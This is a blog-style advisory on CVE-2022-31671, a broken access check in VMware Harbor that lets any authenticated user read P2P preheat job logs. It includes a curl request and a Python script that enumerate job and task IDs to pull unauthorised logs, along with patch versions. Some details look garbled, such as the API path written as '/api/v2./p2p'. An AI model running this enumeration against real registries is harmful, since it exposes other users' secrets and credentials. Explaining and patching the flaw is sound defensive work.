In today’s world, container registries like VMware Harbor are the backbone of cloud-native development. Harbor is valued for its security features, but even the best systems have weak spots. In 2022, security researchers discovered a serious flaw: CVE-2022-31671. This issue lets a malicious user with Harbor access read any job log stored in the database — even privileged ones — just by tweaking a request. If you run Harbor, you must understand this vulnerability.
This article will break down how the bug works, show you example exploit code, and guide you to trusted resources. Whether you’re a DevOps engineer or a security beginner, this guide will help you grasp why CVE-2022-31671 is dangerous and what to do about it.
What is Harbor?
Harbor is an open-source cloud-native registry that stores, signs, and scans container images. It supports key features like access control, image vulnerability scanning, and auditing—all important for keeping your supply chain secure.
About CVE-2022-31671
Advisory summary:
*Harbor fails to check user permissions when reading or updating execution logs for P2P preheat jobs. Any authenticated Harbor user can specify any preheat job ID and gain access to all execution logs, potentially exposing secrets or proprietary details.*
Original reference: NVD National Vulnerability Database - CVE-2022-31671
Discovered by:
Shimo Yanagisawa (Credit via vendor's advisory)
What is a P2P Preheat Job?
Harbor allows images to be *preheated* using peer-to-peer (P2P) distribution (think: pre-caching images). Each preheat job keeps logs to help admins debug or audit what's happened. Ordinarily, only authorized users should see these logs.
The Real Problem
Harbor’s API did not check if a user actually had permission to view or modify a particular job’s logs. The server took the job's ID from the request path and returned—or allowed you to update—the log content with no further permission check.
List all jobs to get their IDs
- Use the API to request the log for any job, including jobs belonging to other projects or higher-privilege users
This could expose sensitive info like deployment details, environment variables, credentials, and more.
Step-by-Step Exploit Example
Suppose you're an authenticated user on a Harbor instance at https://harbor.company.com. You want to read logs for a job you aren’t authorized to view.
1. Get Another Job’s ID
If job IDs are predictable (like 1, 2, 3...), or if you can list them elsewhere, pick one you shouldn’t see.
The affected API route, based on Harbor’s implementation, looks like this
GET /api/v2./p2p/preheat/executions/{execution_id}/tasks/{task_id}/logs
Just replace {execution_id} and {task_id} with numbers.
Here’s a sample with curl
curl -k -u "attacker:password" \
"https://harbor.company.com/api/v2./p2p/preheat/executions/1/tasks/1/logs"
You could keep cycling through IDs (2, 3, ...) until you find juicy logs.
Note: Some setups may require you to first trigger jobs or list tasks, but if you know the pattern, trial and error could work.
Example Snippet: Fast Enumeration in Python
Below is a simple example script to try reading execution logs from various job/task IDs.
import requests
# CHANGE THESE!
BASE_URL = "https://harbor.company.com"
USERNAME = "attacker"
PASSWORD = "password"
session = requests.Session()
session.auth = (USERNAME, PASSWORD)
for execution_id in range(1, 20): # Try various job IDs
for task_id in range(1, 5): # And possible task IDs per job
endpoint = f"/api/v2./p2p/preheat/executions/{execution_id}/tasks/{task_id}/logs"
resp = session.get(BASE_URL + endpoint, verify=False)
if resp.status_code == 200 and resp.text.strip():
print(f"[+] Found logs at {endpoint}:\n{resp.text}\n")
elif resp.status_code != 404:
print(f"[-] {endpoint} returned {resp.status_code}")
Patch: Upgrade to Harbor 2.5.6, 2.6.3, or 2.7. (and newer) where this is fixed.
References
- NVD: CVE-2022-31671
- GitHub Advisory: goharbor/harbor GHSA-546m-x9r7-23ww
- Harbor Release Notes
- Common Harbor API Reference
Summary
CVE-2022-31671 showed that even advanced open-source projects can have basic permission flaws. If you use Harbor and haven’t patched, you’re at risk for user data disclosure through job logs. Always keep your registry up to date, audit your user base, and keep an eye on logs for suspicious requests.
If you found this post valuable, consider sharing with your team or community to keep everyone secure!
Timeline
Published on: 11/14/2024 12:15:17 UTC